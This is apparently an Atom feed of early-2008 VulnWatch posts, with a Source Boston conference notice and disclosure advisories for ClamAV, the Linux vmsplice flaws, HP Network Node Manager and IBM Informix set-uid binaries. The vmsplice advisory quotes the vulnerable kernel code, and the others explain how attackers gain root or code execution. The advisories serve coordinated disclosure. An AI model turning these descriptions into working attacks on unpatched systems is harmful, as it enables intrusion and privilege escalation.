<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
	<id>tag:old.nabble.com,2006:forum-398</id>
	<title>Nabble - Vulnerability - VulnWatch</title>
	<updated>2008-02-19T07:57:35Z</updated>
	<link rel="self" type="application/atom+xml" href="http://old.nabble.com/Vulnerability---VulnWatch-f398.xml" />
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Vulnerability---VulnWatch-f398.html" />
	<subtitle type="html">A non-discussion, non-patch, all-vulnerability annoucement list supported and run by a community of volunteer moderators distributed around the world. - comments provided by seclists.org</subtitle>
	
<entry>
	<id>tag:old.nabble.com,2006:post-15570608</id>
	<title>Source Boston 2008 security con, March 12-14</title>
	<published>2008-02-19T07:57:35Z</published>
	<updated>2008-02-19T07:57:35Z</updated>
	<author>
		<name>Chris Wysopal</name>
	</author>
	<content type="html">&lt;br&gt;&lt;br&gt;There is a new security con coming up that I wanted to let people know
&lt;br&gt;about. &amp;nbsp;I am on the advisory committee and I will be speaking as part of
&lt;br&gt;the L0pht reunion panel. &amp;nbsp;The conference is Source Boston and it will be
&lt;br&gt;occuring March 12-14 in Boston, Ma a few days before St. Patrick's Day.
&lt;br&gt;So not only will there be great speakers but a Boston style pub crawl.
&lt;br&gt;&lt;br&gt;There is a great line up of speakers both from the technical side and the
&lt;br&gt;business side so if you have any entrepreneurial inklings this should be
&lt;br&gt;the perfect con for you.
&lt;br&gt;&lt;br&gt;Here is the schedule: &lt;a href=&quot;http://www.sourceboston.com/sessions/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.sourceboston.com/sessions/&lt;/a&gt;&lt;br&gt;&lt;br&gt;I hope to see you there!
&lt;br&gt;&lt;br&gt;-Chris
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Source-Boston-2008-security-con%2C-March-12-14-tp15570608p15570608.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15446005</id>
	<title>iDefense Security Advisory 02.12.08: ClamAV libclamav PE File Integer Overflow Vulnerability</title>
	<published>2008-02-12T09:35:03Z</published>
	<updated>2008-02-12T09:35:03Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 02.12.08
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Feb 12, 2008
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;Clam AntiVirus is a multi-platform GPL anti-virus toolkit. ClamAV is
&lt;br&gt;often integrated into e-mail gateways and used to scan e-mail traffic
&lt;br&gt;for viruses. It supports virus scanning for a wide variety of packed
&lt;br&gt;Portable Executable (PE) binaries. For more information visit the
&lt;br&gt;vendor's web site at the following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.clamav.net/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.clamav.net/&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Remote exploitation of an integer overflow vulnerability in Clam
&lt;br&gt;AntiVirus' ClamAV, as included in various vendors' operating system
&lt;br&gt;distributions, allows attackers to execute arbitrary code with the
&lt;br&gt;privileges of the affected process.
&lt;br&gt;&lt;br&gt;The vulnerability exists within the code responsible for parsing and
&lt;br&gt;scanning PE files. While iterating through all sections contained in
&lt;br&gt;the PE file, several attacker controlled values are extracted from the
&lt;br&gt;file. On each iteration, arithmetic operations are performed without
&lt;br&gt;taking into consideration 32-bit integer wrap.
&lt;br&gt;&lt;br&gt;Since insufficient integer overflow checks are present, an attacker can
&lt;br&gt;cause a heap overflow by causing a specially crafted Petite packed PE
&lt;br&gt;binary to be scanned. This results in an exploitable memory corruption
&lt;br&gt;condition.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation of this vulnerability results in the execution of arbitrary
&lt;br&gt;code with the privileges of the process using libclamav. In the case of
&lt;br&gt;the clamd program, this will result in code execution with the
&lt;br&gt;privileges of the clamav user. Unsuccessful exploitation results in the
&lt;br&gt;clamd process crashing.
&lt;br&gt;&lt;br&gt;Address Space Layout Randomization (ASLR) and non-executable memory
&lt;br&gt;protection technologies (such as DEP, NX, XD, PaX, etc) can help
&lt;br&gt;mitigate exploitation of this type of vulnerability.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense has confirmed the existence of this vulnerability in ClamAV
&lt;br&gt;0.92. Previous versions may also be affected.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Disabling the scanning of PE files will prevent exploitation.
&lt;br&gt;&lt;br&gt;If using clamscan, this can be done by running clamscan with the
&lt;br&gt;'--no-pe' option.
&lt;br&gt;&lt;br&gt;If using clamdscan, set the 'ScanPE' option in the clamd.conf file to
&lt;br&gt;'no'.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;The ClamAV team has addressed this vulnerability within version 0.92.1.
&lt;br&gt;Additionally, the ClamAV team reports, &amp;quot;the vulnerable module was
&lt;br&gt;remotely disabled via virus-db update on Jan 11th 2008.&amp;quot;
&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2008-0318 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;01/07/2008 &amp;nbsp;Initial vendor notification
&lt;br&gt;01/11/2008 &amp;nbsp;Initial vendor response
&lt;br&gt;02/12/2008 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;This vulnerability was reported to iDefense by Silvio Cesare.
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2008 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15446005&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-02.12.08%3A-ClamAV-libclamav-PE-File-Integer-Overflow-Vulnerability-tp15446005p15446005.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15445037</id>
	<title>CSA-L03: Linux kernel vmsplice unchecked user-pointer dereference</title>
	<published>2008-02-11T23:50:49Z</published>
	<updated>2008-02-11T23:50:49Z</updated>
	<author>
		<name>Wojciech Purczynski</name>
	</author>
	<content type="html">===[ ABSTRACT ]=========================================================
&lt;br&gt;&lt;br&gt;A new vmsplice() system call was introduced in the 2.6.17 release of the
&lt;br&gt;Linux kernel. In the 2.6.23 kernel the system call functionality has
&lt;br&gt;been further extended resulting in two new critical vulnerabilities.
&lt;br&gt;&lt;br&gt;&lt;br&gt;===[ AFFECTED SOFTWARE ]================================================
&lt;br&gt;&lt;br&gt;Linux 2.6.23 - 2.6.24
&lt;br&gt;&lt;br&gt;For the exact kernel version please refer to an information provided by
&lt;br&gt;your vendor.
&lt;br&gt;&lt;br&gt;&lt;br&gt;===[ DESCRIPTION ]======================================================
&lt;br&gt;&lt;br&gt;VULNERABILITY #1
&lt;br&gt;&lt;br&gt;Inappropriate dereference of user-supplied memory pointers in the
&lt;br&gt;code beginning at line 1378 in the vmsplice_to_user() kernel
&lt;br&gt;function (fs/splice.c):
&lt;br&gt;&lt;br&gt;---8&amp;lt;--- fs/splice.c:1378 ---8&amp;lt;---
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; error = get_user(base, &amp;iov-&amp;gt;iov_base);
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; /* ... */
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if (unlikely(!base)) {
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; error = -EFAULT;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; /* ... */
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; sd.u.userptr = base;
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; /* ... */
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; size = __splice_from_pipe(pipe, &amp;sd, pipe_to_user);
&lt;br&gt;---8&amp;lt;--- fs/splice.c:1401 ---8&amp;lt;---
&lt;br&gt;&lt;br&gt;The code lacks validation of these pointers (i.e. with access_ok()).
&lt;br&gt;The __splice_from_pipe() assumes these are valid user-memory pointers
&lt;br&gt;and never makes any verification of them. The function dereferences the
&lt;br&gt;pointers with __copy_to_user_inatomic() function (in pipe_to_user()) in
&lt;br&gt;order to write data to user-process memory in this case leading to
&lt;br&gt;possibility of arbitrary data (read from pipe) to arbitrary kernel
&lt;br&gt;memory.
&lt;br&gt;&lt;br&gt;&lt;br&gt;VULNERABILITY #2
&lt;br&gt;&lt;br&gt;The copy_from_user_mmap_sem() function copies data from user-process
&lt;br&gt;memory with the use of __copy_from_user_inatomic() without validating
&lt;br&gt;user-supplied pointer with access_ok():
&lt;br&gt;&lt;br&gt;---8&amp;lt;--- fs/splice.c:1188 ---8&amp;lt;---
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;partial = __copy_from_user_inatomic(dst, src, n);
&lt;br&gt;---8&amp;lt;--- fs/splice.c:1188 ---8&amp;lt;---
&lt;br&gt;&lt;br&gt;This vulnerability leads to indirect reading of arbitrary kernel memory.
&lt;br&gt;&lt;br&gt;&lt;br&gt;===[ IMPACT ]===========================================================
&lt;br&gt;&lt;br&gt;Vulnerabilities may lead to local system compromise including execution
&lt;br&gt;of arbitrary machine code in the context of running kernel.
&lt;br&gt;&lt;br&gt;Vulnerability #1 has been successfully exploited on Linux 2.6.24.
&lt;br&gt;Vulnerability #2 not tested.
&lt;br&gt;&lt;br&gt;&lt;br&gt;===[ DISCLOSURE TIMELINE ]==============================================
&lt;br&gt;&lt;br&gt;1st Feb 2008	Vendor notification
&lt;br&gt;8th Feb 2008	Public disclosure
&lt;br&gt;&lt;br&gt;&lt;br&gt;===[ AUTHOR ]===========================================================
&lt;br&gt;&lt;br&gt;Wojciech Purczynski &amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15445037&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cliph@...&lt;/a&gt;&amp;gt;
&lt;br&gt;&lt;br&gt;Wojciech Purczynski is a Security Researcher at Vulnerability Research
&lt;br&gt;Labs, COSEINC PTE Ltd.
&lt;br&gt;&lt;a href=&quot;http://coseinc.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://coseinc.com&lt;/a&gt;&lt;br&gt;&lt;br&gt;Wojciech Purczynski is also a member of iSEC Security Research
&lt;br&gt;&lt;a href=&quot;http://isec.pl/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://isec.pl/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;===[ LEGAL DISCLAIMER ]=================================================
&lt;br&gt;&lt;br&gt;Copyright (c) 2008 Wojciech Purczynski
&lt;br&gt;Copyright (c) 2008 COSEINC PTE Ltd.
&lt;br&gt;&lt;br&gt;All Rights Reserved.
&lt;br&gt;&lt;br&gt;PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
&lt;br&gt;ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
&lt;br&gt;PROHIBITED.
&lt;br&gt;&lt;br&gt;THE DOCUMENT IS PROVIDED &amp;quot;AS IS&amp;quot; WITHOUT WARRANTY OF ANY KIND. THE
&lt;br&gt;CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE
&lt;br&gt;LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES,
&lt;br&gt;LOSSES OR UNLAWFUL OFFENCES.
&lt;br&gt;&lt;br&gt;USE AT YOUR OWN RISK.
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/CSA-L03%3A-Linux-kernel-vmsplice-unchecked-user-pointer-dereference-tp15445037p15445037.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15320990</id>
	<title>iDefense Security Advisory 02.04.08: Hewlett-Packard Network Node Manager Topology Manager Service DoS Vulnerability</title>
	<published>2008-02-06T11:19:06Z</published>
	<updated>2008-02-06T11:19:06Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 02.04.08
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Feb 04, 2008
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;HP Network Node Manager is a network mapping and management application
&lt;br&gt;that allows administrators to monitor and control their networks. The
&lt;br&gt;ovtopmd process listens, in a default configuration, on TCP port 2532.
&lt;br&gt;More information can be found on the vendor's site at the following
&lt;br&gt;URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://h20229.www2.hp.com/products/nnm/index.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://h20229.www2.hp.com/products/nnm/index.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Remote exploitation of a denial of service vulnerability in
&lt;br&gt;Hewlett-Packard's Network Node Manager product allows attackers to
&lt;br&gt;crash the ovtopmd process.
&lt;br&gt;&lt;br&gt;The ovtopmd process contains an implementation error, in which it
&lt;br&gt;attempts to access an invalid memory address based on data within the
&lt;br&gt;TCP stream. By sending a specially crafted request, an attacker can
&lt;br&gt;cause the service to crash.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation allows an attacker to crash the ovtopmd process. In order
&lt;br&gt;to exploit this vulnerability, an attacker must be able to establish a
&lt;br&gt;session with the service on TCP port 2532. No authentication is
&lt;br&gt;required to access the vulnerable code path.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense has confirmed this vulnerability in HP's OpenView Network Node
&lt;br&gt;Manager 7.5 with all updates applied as of May 14th, 2007.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Employing firewalls to limit access to the affected service will
&lt;br&gt;mitigate exposure to this vulnerability.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;Hewlett-Packard has addressed this vulnerability in the HPSBMA02307
&lt;br&gt;(SSRT071420) security bulletin. For more information, visit the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01321117&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01321117&lt;/a&gt;&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2008-0212 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;05/14/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;05/15/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;02/04/2008 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;The discoverer of this vulnerability wishes to remain anonymous.
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2008 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15320990&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-02.04.08%3A-Hewlett-Packard-Network-Node-Manager-Topology-Manager-Service-DoS-Vulnerability-tp15320990p15320990.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15280181</id>
	<title>iDefense Security Advisory 01.31.08: IBM Informix Dynamic Server onedcu File Creation Vulnerability</title>
	<published>2008-02-04T11:49:53Z</published>
	<updated>2008-02-04T11:49:53Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 01.31.08
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Jan 31, 2008
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;IBM Corp.'s Informix Dynamic Server is an online transaction processing
&lt;br&gt;data server. For more information, visit the product's homepage at the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www-306.ibm.com/software/data/informix/ids/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www-306.ibm.com/software/data/informix/ids/&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Local exploitation of a file creation vulnerability in IBM Corp.'s
&lt;br&gt;Informix Dynamic Server allows attackers to elevate privileges to root.
&lt;br&gt;&lt;br&gt;The set-uid root &amp;quot;onedcu&amp;quot; command requires six parameters to be
&lt;br&gt;specified when it is executed. The second parameter is a &amp;quot;Trace&amp;quot; file
&lt;br&gt;that this program will open and write to with elevated privileges.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation allows local attackers to gain root privileges.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense confirmed the existence of this vulnerability in IBM Corp.'s
&lt;br&gt;Informix Dynamic Server version 10.00 UC6TL installed on a Linux
&lt;br&gt;system. Other versions are also suspected as vulnerable. Versions for
&lt;br&gt;other supported Unix systems should also be considered vulnerable.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Removing the set-uid bit from the &amp;quot;onedcu&amp;quot; program included with
&lt;br&gt;Informix will prevent exploitation. However, this could disable some
&lt;br&gt;functionality for non-root users.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;IBM Corp. has addressed this vulnerability with the release of version
&lt;br&gt;10.00.xC8 of Informix Dynamic Server. For more information, visit the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www-1.ibm.com/support/docview.wss?uid=swg27011556&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www-1.ibm.com/support/docview.wss?uid=swg27011556&lt;/a&gt;&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2008-0368 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;09/01/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;09/13/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;01/31/2008 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;The discoverer of this vulnerability wishes to remain anonymous.
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2008 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=15280181&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-01.31.08%3A-IBM-Informix-Dynamic-Server-onedcu-File-Creation-Vulnerability-tp15280181p15280181.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-15279231</id>
	<title>iDefense Security Advisory 01.31.08: IBM Informix Dynamic Server SQLIDEBUG File Creation Vulnerability</title>
	<published>2008-02-04T11:48:20Z</published>
	<updated>2008-02-04T11:48:20Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 01.31.08
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Jan 31, 2008
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;IBM Corp.'s Informix Dynamic Server is an online transaction processing
&lt;br&gt;data server. For more information, visit the product's homepage at the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www-306.ibm.com/software/data/informix/ids/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www-306.ibm.com/software/data/informix/ids/&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Local exploitation of a file creation vulnerability in IBM Corp.'s
&lt;br&gt;Informix Dynamic Server allows attackers to elevate privileges to root.
&lt;br&gt;&lt;br&gt;When the SQLIDEBUG environment variable is set, several set-uid binaries
&lt;br&gt;will log debugging information to the specified file.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation allows local attackers to gain root privileges.
&lt;br&gt;&lt;br&gt;After creating the file, the file's ownership is changed to match the
&lt;br&gt;user and group of the executing user. As such, an attacker could create
&lt;br&gt;files that they own anywhere on the system.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense confirmed the existence of this vulnerability in IBM Corp.'s
&lt;br&gt;Informix Dynamic Server version 10.00 UC6TL installed on a Linux
&lt;br&gt;system. Other versions are also suspected as vulnerable. Versions for
&lt;br&gt;other supported Unix systems should also be considered vulnerable.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Removing the set-uid bit from all programs included with Informix will
&lt;br&gt;prevent exploitation. However, this could disable some functionality
&lt;br&gt;for non-root users.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;IBM Corp. has addressed this vulnerability with the release of version
&lt;br&gt;10.00.xC8 of Informix Dynamic Server. For more information, visit the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www-1.ibm.com/support/docview.wss?uid=swg27011556&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www-1.ibm.com/support/docview.wss?uid=swg27011556&lt;/a&gt;&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2008-0369 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;09/01/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;09/13/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;01/31/2008 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;The discoverer of this vulnerability wishes to remain anonymous.
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
